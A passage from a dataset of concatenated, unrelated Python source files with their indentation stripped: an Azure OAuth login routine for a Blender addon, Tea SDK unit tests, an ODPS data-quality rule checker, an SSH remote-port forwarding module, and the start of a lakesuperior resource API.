- log (:class:`batchapps.log.PickleLog`): A logger object as set in
BatchAppsSettings.
:Returns:
- ``True`` if the addon was successfully authenticated,
else ``False``
"""
try:
log.info("Checking for unattended session...")
self.props.credentials = AzureOAuth.get_unattended_session(config=cfg)
log.info("Found!")
return True
except (AuthenticationException, InvalidConfigException) as exp:
log.info("Could not get unattended session: {0}".format(exp))
try:
log.info("Checking for cached session...")
self.props.credentials = AzureOAuth.get_session(config=cfg)
log.info("Found!")
return True
except (AuthenticationException, InvalidConfigException) as exp:
log.info("Could not get cached session: {0}".format(exp))
return False
def wait_for_request(self):
"""
Once the user has been prompted to authenticate in a web browser
session, start a basic HTTPServer to intercept the AAD redirect call
to collect the server response to the auth request.
The localhost redirect URL will depend on how the client is set up in
the AAD portal.
The server has a timeout of 1 minute.
"""
session = bpy.context.scene.batchapps_session
self.props.code=None
config = bpy.context.scene.batchapps_session.cfg
redirect = config.aad_config()['redirect_uri'].split(':')
server_address = (redirect[0], int(redirect[1]))
web_server = HTTPServer(server_address, OAuthRequestHandler)
session.log.debug("Created web server listening at: {0}, {1}.".format(
redirect[0], int(redirect[1])))
web_server.timeout = TIMEOUT
web_server.handle_request()
web_server.server_close()
session.log.debug("Closed server.")
def open_websession(self):
"""
Open a web browser session to prompt the user to authenticate via their
AAD credentials.
This method of authentication is the 'last resort' after
auto-authentication and unattended authentication have failed.
:Raises:
- :class:`RuntimeError` if authentication fails, which will fail
the loading of the addon as all auth routes have failed. This
could be due to either an
:class:`batchapps.exceptions.AuthenticationException` of a
:class:`batchapps.exceptions.InvalidConfigException`.
"""
session = bpy.context.scene.batchapps_session
try:
url, state = AzureOAuth.get_authorization_url(config=session.cfg)
webbrowser.open(url)
session.log.info("Opened web browser for authentication "
"and waiting for response.")
self.wait_for_request()
except (AuthenticationException, InvalidConfigException) as exp:
session.log.error("Unable to open Web UI auth session: "
"{0}".format(exp))
raise RuntimeError("Failed to authorize addon")
def decode_error(self, val):
"""
Format the auth redirect URL to extract the auth code.
:Args:
- val (str): The redirect URL.
:Returns:
- The auth code (str).
"""
error_idx = self.props.code.find(val)
if error_idx < 0:
return None
strt_idx = error_idx + len(val)
end_idx = self.props.code.find('&', strt_idx)
error_val = self.props.code[strt_idx:end_idx]
return unquote(error_val)
def web_authentication(self):
"""
Prompts user to authenticate via a web browser session, after
auto-authentication and unattended authentication have failed.
If web authentication is successful, the session (i.e. refresh token)
will be cached to enable auto-authentication next time the addon is
used. Session page will be set to the HOME page.
If unsuccessful, the addon will failed to load and the ERROR page will
be display. Error details will be logged to the console.
"""
session = bpy.context.scene.batchapps_session
if self.auto_authentication(session.cfg, session.log):
session.start(self.props.credentials)
session.page = "HOME"
session.redraw()
return
self.open_websession()
if not self.props.code:
session.log.warning("Log in timed out - please try again.")
session.page = "LOGIN"
elif '/?error=' in self.props.code:
error = self.decode_error('/?error=')
details = self.decode_error(
'&error_description=').replace('+', ' ')
session.log.error("Authentication failed: {0}".format(error))
session.log.error(details)
session.page = "ERROR"
else:
session.log.info(
"Received valid authentication response from web browser.")
session.log.info("Now retrieving new authentication token...")
self.props.credentials = AzureOAuth.get_authorization_token(
self.props.code, config=session.cfg)
session.start(self.props.credentials)
session.log.info("Successful! Login complete.")
session.redraw() |
test_core.py | import unittest
import time
import asyncio
from unittest import mock
from requests.exceptions import ProxyError
from Tea.vendored.aiohttp.client_exceptions import ClientProxyConnectionError
from Tea.model import TeaModel
from Tea.core import TeaCore
from Tea.request import TeaRequest
from Tea.exceptions import TeaException, RetryError
from Tea.stream import BaseStream
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
class Request(BaseHTTPRequestHandler):
def do_POST(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
body = self.rfile.read(int(self.headers['content-length']))
self.wfile.write(b'{"result": "%s"}' % body)
def run_server():
server = HTTPServer(('localhost', 8888), Request)
server.serve_forever()
class TeaStream(BaseStream):
def __init__(self):
super().__init__()
self.content = b'tea test'
def read(self, size=1024):
content = self.content
self.content = b''
return content
def __len__(self):
return len(b'tea test')
def __next__(self):
content = self.read()
if content:
return content
else:
raise StopIteration
class BaseUserResponse(TeaModel):
def __init__(self):
self.avatar = None
self.createdAt = None
self.defaultDriveId = None
self.description = None
self.domainId = None
self.email = None
self.nickName = None
self.phone = None
self.role = None
self.status = None
self.updatedAt = None
self.userId = None
self.userName = None
self.array = None
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
return {
'avatar': self.avatar,
'createdAt': self.createdAt,
'defaultDriveId': self.defaultDriveId,
'description': self.description,
'domainId': self.domainId,
'email': self.email,
'nickName': self.nickName,
'phone': self.phone,
'role': self.role,
'status': self.status,
'updatedAt': self.updatedAt,
'userId': self.userId,
'userName': self.userName,
}
def from_map(self, map=None):
dic = map or {}
self.avatar = dic.get('avatar')
self.createdAt = dic.get('createdAt')
self.defaultDriveId = dic.get('defaultDriveId')
self.description = dic.get('description')
self.domainId = dic.get('domainId')
self.email = dic.get('email')
self.nickName = dic.get('nickName')
self.phone = dic.get('phone')
self.role = dic.get('role')
self.status = dic.get('status')
self.updatedAt = dic.get('updatedAt')
self.userId = dic.get('userId')
self.userName = dic.get('userName')
self.array = []
if dic.get('array') is not None:
for i in dic.get('array'):
self.array.append(i)
return self
class ListUserResponse(TeaModel):
def __init__(self):
super().__init__()
self.items = None
self.nextMarker = None
@classmethod
def names(cls):
return {
"items": "items",
"nextMarker": "next_marker",
}
@classmethod
def requireds(cls):
return {
"items": False,
"nextMarker": False,
}
class TestCore(unittest.TestCase):
@classmethod
def setUpClass(cls):
server = threading.Thread(target=run_server)
server.setDaemon(True)
server.start()
def test_compose_url(self):
request = TeaRequest()
try:
TeaCore.compose_url(request)
except Exception as e:
self.assertEqual('"endpoint" is required.', str(e))
request.headers['host'] = "fake.domain.com"
self.assertEqual("http://fake.domain.com",
TeaCore.compose_url(request))
request.headers['host'] = "http://fake.domain.com"
self.assertEqual("http://fake.domain.com",
TeaCore.compose_url(request))
request.port = 8080
self.assertEqual("http://fake.domain.com:8080",
TeaCore.compose_url(request))
request.pathname = "/index.html"
self.assertEqual("http://fake.domain.com:8080/index.html",
TeaCore.compose_url(request))
request.query["foo"] = ""
self.assertEqual("http://fake.domain.com:8080/index.html?foo=",
TeaCore.compose_url(request))
request.query["foo"] = "bar"
self.assertEqual("http://fake.domain.com:8080/index.html?foo=bar",
TeaCore.compose_url(request))
request.pathname = "/index.html?a=b"
self.assertEqual("http://fake.domain.com:8080/index.html?a=b&foo=bar",
TeaCore.compose_url(request))
request.pathname = "/index.html?a=b&"
self.assertEqual("http://fake.domain.com:8080/index.html?a=b&foo=bar",
TeaCore.compose_url(request))
request.query["fake"] = None
self.assertEqual("http://fake.domain.com:8080/index.html?a=b&foo=bar",
TeaCore.compose_url(request))
def test_do_action(self):
request = TeaRequest()
request.headers['host'] = "www.alibabacloud.com"
request.pathname = "/s/zh"
request.query["k"] = "ecs"
option = {
"readTimeout": 20000,
"connectTimeout": 10000,
"httpProxy": None,
"httpsProxy": None,
"noProxy": None,
"maxIdleConns": None,
"retry": {
"retryable": None,
"maxAttempts": None
},
"backoff": {
"policy": None,
"period": None
},
'debug': 'sdk',
"ignoreSSL": None
}
resp = TeaCore.do_action(request, option)
self.assertTrue(resp.headers.get('server'))
self.assertIsNotNone(bytes.decode(resp.body))
option['httpProxy'] = '127.0.0.1'
option['httpsProxy'] = '127.0.0.1'
option['noProxy'] = '127.0.0.1'
try:
TeaCore.do_action(request, option)
assert False
except Exception as e:
self.assertIsInstance(e, RetryError)
def test_async_do_action(self):
request = TeaRequest()
request.headers['host'] = "www.alibabacloud.com"
request.protocol = 'https'
request.pathname = "/s/zh"
request.query["k"] = "ecs"
option = {
"readTimeout": 20000,
"connectTimeout": 10000,
"httpProxy": None,
"httpsProxy": None,
"noProxy": None,
"maxIdleConns": None,
"retry": {
"retryable": None,
"maxAttempts": None
},
"backoff": {
"policy": None,
"period": None
},
"ignoreSSL": None
}
loop = asyncio.get_event_loop()
task = asyncio.ensure_future(
TeaCore.async_do_action(request, option)
)
loop.run_until_complete(task)
response = task.result()
self.assertTrue(response.headers.get('server'))
self.assertIsNotNone(bytes.decode(response.body))
request.protocol = 'http'
option['httpProxy'] = 'http://127.0.0.1'
try:
loop.run_until_complete(TeaCore.async_do_action(request, option))
assert False
except Exception as e:
self.assertIsInstance(e, RetryError)
def test_get_response_body(self):
moc_resp = mock.Mock()
moc_resp.content = "test".encode("utf-8")
self.assertAlmostEqual("test", TeaCore.get_response_body(moc_resp))
def test_allow_retry(self):
self.assertFalse(TeaCore.allow_retry(None, 0))
dic = {}
self.assertFalse(TeaCore.allow_retry(dic, 0))
dic["retryable"] = True
dic["maxAttempts"] = 3
self.assertTrue(TeaCore.allow_retry(dic, 0))
self.assertFalse(TeaCore.allow_retry(dic, 4))
dic["maxAttempts"] = None
self.assertFalse(TeaCore.allow_retry(dic, 1))
dic["retryable"] = False
dic["maxAttempts"] = 3
self.assertTrue(TeaCore.allow_retry(dic, 0))
self.assertFalse(TeaCore.allow_retry(dic, 1))
def test_get_backoff_time(self):
dic = {}
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["policy"] = None
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["policy"] = ""
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["policy"] = "no"
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["policy"] = "yes"
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["period"] = None
self.assertEqual(0, TeaCore.get_backoff_time(dic, 1))
dic["period"] = -1
self.assertEqual(1, TeaCore.get_backoff_time(dic, 1))
dic["period"] = 1000
self.assertEqual(1000, TeaCore.get_backoff_time(dic, 1))
def test_sleep(self):
ts_before = int(round(time.time() * 1000))
TeaCore.sleep(1)
ts_after = int(round(time.time() * 1000))
ts_subtract = ts_after - ts_before
self.assertTrue(1000 <= ts_subtract < 1100)
def test_is_retryable(self):
self.assertFalse(TeaCore.is_retryable("test"))
ex = TeaException({})
self.assertFalse(TeaCore.is_retryable(ex))
ex = RetryError('error')
self.assertTrue(TeaCore.is_retryable(ex))
def test_bytes_readable(self):
body = "test".encode('utf-8')
self.assertIsNotNone(TeaCore.bytes_readable(body))
def test_merge(self):
model = BaseUserResponse()
dic = TeaCore.merge(model, {'k1': 'test'})
self.assertEqual(
{
'avatar': None,
'createdAt': None,
'defaultDriveId': None,
'description': None,
'domainId': None,
'email': None,
'nickName': None,
'phone': None,
'role': None,
'status': None,
'updatedAt': None,
'userId': None,
'userName': None,
'k1': 'test'
}, dic
)
def test_to_map(self):
model = BaseUserResponse()
model.phone = '139xxx'
model.domainId = 'domainId'
m = TeaCore.to_map(model)
self.assertEqual('139xxx', m['phone'])
self.assertEqual('domainId', m['domainId'])
m = TeaCore.to_map(None)
self.assertEqual({}, m)
model = BaseUserResponse()
model._map = {'phone': '139xxx'}
m = TeaCore.to_map(model)
self.assertEqual({'phone': '139xxx'}, m)
def test_from_map(self):
model = BaseUserResponse()
model.phone = '139xxx'
model.domainId = 'domainId'
m = {
'phone': '138',
'domainId': 'test'
}
model1 = TeaCore.from_map(model, m)
self.assertEqual('138', model1.phone)
self.assertEqual('test', model1.domainId)
m = {
'phone': '138',
'domainId': 'test',
'array': 123
}
model2 = TeaCore.from_map(model, m)
self.assertEqual([], model2.array)
self.assertEqual(123, model2._map['array'])
def test_async_stream_upload(self):
request = TeaRequest()
request.method = 'POST'
request.protocol = 'http'
request.headers['host'] = "127.0.0.1:8888"
loop = asyncio.get_event_loop()
task = asyncio.ensure_future(TeaCore.async_do_action(request))
f = TeaStream()
request.body = f
loop.run_until_complete(task)
self.assertEqual(b'{"result": "tea test"}', task.result().body)
|
py_two_stage_rule_check_v0_copy.98_2 copy.py | # -*- coding:utf-8 -*-
# @Time : 2020/07/19
# @Author : WangHongGang
# @File : py_two_stage_rule_check
# 代码更新0.98_1版 by WangHongGang 20200730
# 1. 重新设计查询语句,建立新结果表s_rwgl_zxjg_new, 原有执行方式推翻.
# 代码更新0.98_2版 by WangHongGang 20210117
# 1. 重新设计_run_check()函数执行逻辑。
# a. 取消主键判定,不再判定主键是否为空
# b. SQL主代码增加重点字段判定,结果为cnt_wtms_字段名
# c. 合并所有cnt_wtms_字段名 结果, 整合成cnt_wtms字段,内容为字符串'cnt_wtms_字段名:数值,cnt_wtms_字段名:数值'
# 2. 结果表wts字段后,增加cnt_wtms字段,类型为str。通过_write_result()函数写入表
import time
import datetime
import threading
from Queue import Queue
import contextlib
import uuid
# import sys
class ThreadPool(object):
def __init__(self, max_num):
self.StopEvent = 0
self.q = Queue()
self.max_num = max_num
self.terminal = False
self.created_list = []
self.free_list = []
self.Deamon = False
# change args into *args
def run(self, func, args=None, callback=None):
task = (func, args, callback)
self.q.put(task)
if len(self.free_list) == 0 and len(self.created_list) < self.max_num:
self.create_thread()
def create_thread(self):
t = threading.Thread(target=self.call)
# t.setDemeon(self.Deamon)
t.start()
self.created_list.append(t)
def call(self):
current_thread = threading.current_thread()
event = self.q.get()
while event != self.StopEvent:
func, arguments, callback = event
try:
# print(current_thread, func)
result = func(*arguments)
func_execute_status = True
except Exception as e:
func_execute_status = False
result = None
print('回调函数执行产生错误: '),
print(e)
if func_execute_status:
if callback is not None:
try:
callback(result)
except Exception as e:
print('回调函数执行产生错误: '),
print(e)
with self.worker_state(self.free_list, current_thread):
if self.terminal:
event = self.StopEvent
else:
event = self.q.get()
else:
self.created_list.remove(current_thread)
# print(current_thread, 'is closed!!! {} threads remain!!'.format(len(self.created_list)))
def close(self):
full_size = len(self.created_list)
while full_size:
self.q.put(self.StopEvent)
full_size -= 1
def terminate(self):
self.terminal = True
while self.created_list:
self.q.put(self.StopEvent)
self.q.queue.clear()
def join(self):
for t in self.created_list:
t.join()
@contextlib.contextmanager
def worker_state(self, state_list, worker_thread):
state_list.append(worker_thread)
try:
yield
finally:
state_list.remove(worker_thread)
def get_time():
return datetime.datetime.now()
def yesterday_str(): # 昨天日期
# today = datetime.datetime.now()
oneday = datetime.timedelta(days=1)
yesterday = TODAY - oneday
str_yesterday = yesterday.strftime('%Y%m%d')
return str_yesterday
def before_yesterday_str(): # 前天日期
# today = datetime.datetime.now()
twoday = datetime.timedelta(days=2)
before_yesterday = TODAY - twoday
str_before_yesterday = before_yesterday.strftime('%Y%m%d')
return str_before_yesterday
class Rule(object):
def __init__(self, rule_detail_table_name, max_threads_num = 1):
self.rule_detail_table_name = rule_detail_table_name
self.rules = []
self.rwid = TODAY.strftime('%Y%m%d%H%M%S')
self.pool = ThreadPool(max_threads_num)
print("**********RWID is: {} **********".format(self.rwid))
def go(self):
self._read_rule()
for rule in self.rules:
# self.pool.run(func=self._run_check, args=(rule,),)
# after changing, take away ,
self.pool.run(func=self._run_check, args=(rule,),)
self.pool.close()
self.pool.join()
def _read_rule(self): # 读取规则表
# print('Starting read rules....')
rule_detail_table_name = self.rule_detail_table_name
# _sql_str = '''
# select * from {0} where bbh not in ('a3f4c2e0-53f4-475c-be77-0436746a079f','0ca8332a-7dce-411f-a1b8-8548ecf501b1') order by id;
# '''.format(rule_detail_table_name)
_sql_str = 'select * from {0} where bbh in (select gzid from PRO_ADS_QUALITYRULE_DEV.s_gzid_list_tbl) order by id'.format(
rule_detail_table_name)
rules = []
with odps.execute_sql(_sql_str).open_reader() as target_reader:
for _record in target_reader:
_tmp_rule = {}
_is_empty = False
if _record['xfbz'] != '0':
continue
for rule in _record:
_key = rule[0].strip().encode('utf-8').lower()
_value = rule[1]
if _key == 'id' and (_value is None or _value == ''):
# 检查id为空
_is_empty = True
break
elif _key == 'bbh' and (_value is None or _value == ''):
# 检查bbh为空
_is_empty = True
break
elif _value is None or _value == '':
_tmp_rule[_key] = ''
else:
_tmp_rule[_key] = _value.strip().encode('utf-8')
if not _is_empty:
rules.append(_tmp_rule)
self.rules = rules
# print('Read rules completed!')
def _run_check(self, rule):
_ct = threading.current_thread()
#print'Start Check rule... ', rule['bbh'], get_time(),_ct
print "Start Check rule... %s %s %s"%(rule['bbh'],get_time(),_ct)
sql = rule['sql']
sumsql = rule['sumsql']
xfbz = rule['xfbz']
wtsql_wt_id = rule['wtsql_wt_id']
gzid = rule['bbh']
table_name = rule['table_name']
bzxz = rule['bzxz']
rwid = self.rwid
ksrq = get_time()
# needed_dt = '20200726'
needed_dt = YESTERDAY_STR
sql = sql.replace('\xef\xbc\x8c', ',')
sql = sql.replace('getdate()', "to_date({}, 'yyyymmdd')".format(needed_dt))
sql = sql.replace('GETDATE()', "to_date({}, 'yyyymmdd')".format(needed_dt))
# 注意:由于将getdate()替换为needed_dt,所以实际日期要根据needed_dt的值来确定。比如needed_dt为yesterday,那么跑的数为yesterday-1,也就是前天的数
# # 测试
# self.rwid = rwid = '20200729160000'
# print("RWID is: {}".format(self.rwid))
# wtsql_wt_id = 'bbh,xfbz'
# sql = """
# select provincial_id,bbh,xfbz,table_name from(
# select id provincial_id, bbh,xfbz,table_name from S_YWGZ_GZMX limit 10) a
# """
# # 测试
result = []
memo = ''
zt = 'Successed'
_sql_str = sql.lower()
_cnt_wts_str = ' COUNT(1) wts'
org_cnt_ids = []
if bzxz is None:
bzxz = ''
bzxz = bzxz.lower()
bzxz = bzxz.replace('\xef\xbc\x8c', ',')
bzxz = bzxz.replace(' ', '')
org_cnt_ids = bzxz.split(',')
cnt_ids = []
_cnt_sql = ''
_cnt_ids_str = ''
if bzxz != '':
for _cnt_id in org_cnt_ids:
# cnt_ids.append('cnt_wtms_' + _cnt_id)
cnt_ids.append('cnt_wtms_' + _cnt_id)
_tmp_ids_str = 'wtms_' + _cnt_id
_tmp_cnt_ids_str = 'cnt_' + _tmp_ids_str +', '
_tmp_cnt_sql = 'count({}) {}'.format(_tmp_ids_str, _tmp_cnt_ids_str)
_cnt_sql += _tmp_cnt_sql
_cnt_ids_str += _tmp_cnt_ids_str
_cnt_sql = ', ' + _cnt_sql[:-2]
_cnt_ids_str = ', ' + _cnt_ids_str[:-2]
i = _sql_str.find(',') + 1
j = _sql_str.find('from')
sql = sql[:i] + _cnt_wts_str + _cnt_sql + ' ' + sql[j:] + ' group by provincial_id'
_sql_str = """
select provincial_id dsbm, wts{cnt_ids} from ({sql}) table_final
""".format(cnt_ids=_cnt_ids_str, sql=sql)
sql = _sql_str
try:
_line_num = 0
with odps.execute_sql(sql).open_reader() as reader:
#print '正在执行规则:%s 实例id为%s'%(gzid, sql_instance1.id)
for record in reader:
_line_num += 1
# 20201231修正(WHG):如果provincial_id出现空值,则当前规则运行失败,
# 记录'provincial_id is None'
if record['dsbm'] is None:
zt = 'Failed'
memo = 'provincial_id is None'
result.append([table_name, '', 0, '','', ''])
break
_dsbm = record['dsbm'].encode('utf-8').strip()
_wts = record['wts']
_cnt_wtms = ''
for _tmp_cnt_id in cnt_ids:
_tmp_cnt_wtms = str(record[_tmp_cnt_id])
# _cnt_wtms = _tmp_cnt_wtms + ':' + _tmp_cnt_id
_tmp_cnt_id = _tmp_cnt_id[9:]
result.append([table_name, _dsbm, _wts, _tmp_cnt_id, _tmp_cnt_wtms])
# _cnt_wtms = _cnt_wtms[:-1]
if _line_num == 0:
zt = 'Nodata'
result.append([table_name, '', 0, '', ''])
except Exception as e:
zt = 'Failed'
#sql_instance1.stop()
memo = str(e)
result.append([table_name, '', 0, '', ''])
# print('Got Error: ', e, 'sql:',sumsql, 'gzid:', gzid)
jsrq = get_time()
for line in result:
line.append(ksrq)
line.append(jsrq)
line.append(zt)
line.append(memo)
print(result)
self._write_result(result, gzid)
def _write_result(self, write_data, gzid):
ct = threading.current_thread()
# print("Writing result....", gzid, get_time(), ct)
for line in write_data:
id_str = str(uuid.uuid1())
line.insert(0,gzid)
line.insert(0,id_str)
pt_str = 'rwid=' + self.rwid
result_table_name = TABLE_PROJECT_SPACE + '.' +S_RWGL_ZXJG
try:
tgt_table = odps.get_table(result_table_name)
if not tgt_table.exist_partition(pt_str):
tgt_table.create_partition(pt_str, if_not_exists=True)
with tgt_table.open_writer(partition=pt_str) as writer:
writer.write(write_data)
except Exception as e:
print('Write error: '),
print(gzid),
print(e)
print "Write complete... ", gzid,get_time(), ct
def thread_check(q, pool, time_limit=5):
time.sleep(10)
global TERMINATE_TIME
cts = []
ct = q.get()
cts.append([ct, get_sec_time()])
def _stop_all():
print('!!!Stop all process cause TERMINATE_TIME!!!')
pool.q.queue.clear()
full_size = pool.max_num
while full_size:
pool.q.put(pool.StopEvent)
full_size -= 1
time.sleep(1)
for t in pool.created_list:
stop_thread(t)
q.queue.clear()
GZ_STATUS_Q.queue.clear()
return
while True:
print('\nThread check new circle...')
# 20200828修正,增加到指定时间强制停止程序功能
if DEV_MODE:
if TERMINATE_TIME:
time.sleep(5)
TERMINATE_TIME = get_time().strftime('%H:%M:%S')
else:
TERMINATE_TIME = None
if TERMINATE_TIME is not None:
if len(TERMINATE_TIME) == 8:
_cur_time = time.strptime(get_time().strftime('%H:%M:%S'), '%H:%M:%S')
_terminate_time = time.strptime(TERMINATE_TIME, '%H:%M:%S')
if _cur_time >= _terminate_time:
_stop_all()
break
elif len(TERMINATE_TIME) == 19:
_cur_time = time.strptime(get_time().strftime('%Y-%m-%d %H:%M:%S'), '%Y-%m-%d %H:%M:%S')
_terminate_time = time.strptime(TERMINATE_TIME, '%Y-%m-%d %H:%M:%S')
if _cur_time >= _terminate_time:
_stop_all()
break
else:
print('TERMINATE_TIME fromat error!')
TERMINATE_TIME == None
###########################################
while not q.empty():
ct = q.get()
cts.append([ct, get_sec_time()])
if len(cts) == 1:
if cts[0][0] == 0:
break
print('Running thread in pool: ')
for ct in cts:
if ct[0] != 0:
continued_time = int(get_sec_time() - ct[1])
print('{} continue time: {}'.format(ct, continued_time))
if continued_time > time_limit:
print('killing thread {0}, runing over {1} secs.'.format(ct, continued_time))
stop_thread(ct[0])
time.sleep(1)
try:
cts.remove(ct)
except:
pass
elif not ct[0].isAlive():
try:
cts.remove(ct)
except:
pass
# print('Running thread in pool: ')
for t in pool.created_list:
# print(t)
if not t.isAlive():
try:
# print('remove thread...', t)
pool.created_list.remove(t)
except:
pass
n = pool.max_num - len(pool.created_list)
if n > 0:
# print('add new thread...')
for i in range(0, n):
pool.create_thread()
# print('Pool created_list: ', len(pool.created_list))
time.sleep(_THREAD_CHECK_INTERVAL)
print('Thread check is closing...')
GZ_STATUS_Q.put(0)
q.put('Stoped')
def main(max_threads_num):
start_time = get_time()
print '**********Job Starting!!!', start_time ,'**********'
rule_table_name = TABLE_PROJECT_SPACE + '.' + S_YWGZ_GZMX
r = Rule(rule_table_name, max_threads_num)
r.go()
finish_time = get_time()
print 'Job Finished!!!', finish_time
print 'Job total cost time: {}'.format(finish_time - start_time)
TODAY = datetime.datetime.now()
TODAY_STR = TODAY.strftime('%Y%m%d')
YESTERDAY_STR = yesterday_str()
DEV_TABLE_PROJECT_SPACE = 'PRO_ADS_QUALITYRULE_DEV' # 开发环境
TABLE_PROJECT_SPACE = DEV_TABLE_PROJECT_SPACE
S_YWGZ_GZMX = 'S_YWGZ_GZMX' # 规则表
S_RWGL_ZXJG = 'S_RWGL_ZXJG_NEW_1' # 任务执行结果表
if __name__ == '__main__':
options.tunnel.use_instance_tunnel = True
options.tunnel.limit_instance_tunnel = False
options.connect_timeout = 300
options.read_timeout = 240
max_threads_num = 5 # 最大并发线程数
main(max_threads_num)
|
ssh_remote_port.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
##############################################################################
#
# Acrisel LTD
# Copyright (C) 2008- Acrisel (acrisel.com) . All Rights Reserved
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
import logging
from sshpipe.sshpipe import SSHPipe
from sshpipe.pipe_listener import pipe_listener_forever, EXIT_MESSAGE
import multiprocessing as mp
module_logger = logging.getLogger(__name__)
def remote_socket_agent(port, exit_message=EXIT_MESSAGE, pickle_loads=False, imports=None):
''' Forward SSH messages to port
'''
global module_logger
controlq = mp.Queue()
kwargs = {'queue':controlq, 'port':port, 'exit_message':exit_message, 'pickle_loads': pickle_loads, 'imports':imports, 'logger': module_logger,}
listener = mp.Process(target=pipe_listener_forever, kwargs=kwargs, daemon=True)
listener.start()
active = True
while active:
msg = controlq.get()
active = msg == EXIT_MESSAGE
class SSHRemotePort(SSHPipe):
''' Facilitates sending information to remote host:port via ssh channel
'''
def __init__(self, host, port, pack=False, exit_message=None, imports=None, logger=None, *args, **kwargs):
self.host = host
self.port = port
self.pack = pack
cmd_parts= ["ssh_remote_port.py --port {}".format(port)]
if imports:
cmd_parts.append("--imports {}".format(imports))
if pack:
cmd_parts.append("--pickle-loads")
if exit_message:
cmd_parts.append("--exit-message {}".format(exit_message))
command = ' '.join(cmd_parts)
super(SSHRemotePort, self).__init__(self.host, command, *args, logger=logger, **kwargs) #=module_logger)
def start(self):
super(SSHRemotePort, self).start(wait=0.2)
def cmdargs():
import argparse
import os
filename = os.path.basename(__file__)
progname = filename.rpartition('.')[0]
parser = argparse.ArgumentParser(description="%s runs SSH Port Agent" % progname)
parser.add_argument('--port', type=int,
help="""Port to forward messages to.""")
parser.add_argument('--exit-message', type=str, dest='exit_message', default=EXIT_MESSAGE,
help="""string to use as exit message, default: {}.""".format(EXIT_MESSAGE))
parser.add_argument('--pickle-loads', action='store_true', default=False, dest='pickle_loads',
help='if set, will pikcle.loads() message before sending to port.')
parser.add_argument('--imports', type=str, required=False, dest='imports', nargs='*',
help="""import module before pickle loads.""")
args = parser.parse_args()
return args
if __name__ == '__main__':
mp.freeze_support()
mp.set_start_method('spawn')
args = cmdargs()
remote_socket_agent(args)
|
resource.py | import logging
from functools import wraps
from itertools import groupby
from multiprocessing import Process
from threading import Lock, Thread
import arrow
from rdflib import Literal
from rdflib.namespace import XSD
from lakesuperior.config_parser import config
from lakesuperior.dictionaries.namespaces import ns_collection as nsc
from lakesuperior.exceptions import (
InvalidResourceError, ResourceNotExistsError, TombstoneError)
from lakesuperior import env, thread_env
from lakesuperior.globals import RES_DELETED, RES_UPDATED
from lakesuperior.model.ldp.ldp_factory import LDP_NR_TYPE, LdpFactory
from lakesuperior.model.ldp.ldpr import Ldpr
from lakesuperior.util.toolbox import rel_uri_to_urn
logger = logging.getLogger(__name__)
__doc__ = """
Primary API for resource manipulation.
Quickstart::
>>> # First import default configuration and globals—only done once.
>>> import lakesuperior.default_env
>>> from lakesuperior.api import resource
>>> # Get root resource.
>>> rsrc = resource.get('/')
>>> # Dump graph.
>>> with rsrc.imr.store.txn_ctx():
>>> print({*rsrc.imr.as_rdflib()})
{(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://purl.org/dc/terms/title'),
rdflib.term.Literal('Repository Root')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/fcrepo#Container')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/fcrepo#RepositoryRoot')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/fcrepo#Resource')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#BasicContainer')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#Container')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#RDFSource'))}
"""
def transaction(write=False):
"""
Handle atomic operations in a store.
This wrapper ensures that a write operation is performed atomically. It
also takes care of sending a message for each resource changed in the
transaction.
ALL write operations on the LDP-RS and LDP-NR stores go through this
wrapper.
"""
def _transaction_deco(fn):
@wraps(fn)
def _wrapper(*args, **kwargs):
# Mark transaction begin timestamp. This is used for create and
# update timestamps on resources.
thread_env.timestamp = arrow.utcnow()
thread_env.timestamp_term = Literal(
thread_env.timestamp, datatype=XSD.dateTime)
with env.app_globals.rdf_store.txn_ctx(write):
ret = fn(*args, **kwargs)
if len(env.app_globals.changelog):
job = Thread(target=_process_queue)
job.start()
delattr(thread_env, 'timestamp')
delattr(thread_env, 'timestamp_term')
return ret
return _wrapper
return _transaction_deco
def _process_queue():
"""
Process the message queue on a separate thread.
"""
lock = Lock()
lock.acquire()
while len(env.app_globals.changelog):
_send_event_msg(*env.app_globals.changelog.popleft())
lock.release()
def _send_event_msg(remove_trp, add_trp, metadata):
"""
Send messages about a changed LDPR.
A single LDPR message packet can contain multiple resource subjects, e.g.
if the resource graph contains hash URIs or even other subjects. This
method groups triples by subject and sends a message for each of the
subjects found.
"""
# Group delta triples by subject.
remove_grp = groupby(remove_trp, lambda x : x[0])
remove_dict = {k[0]: k[1] for k in remove_grp}
add_grp = groupby(add_trp, lambda x : x[0])
add_dict = {k[0]: k[1] for k in add_grp}
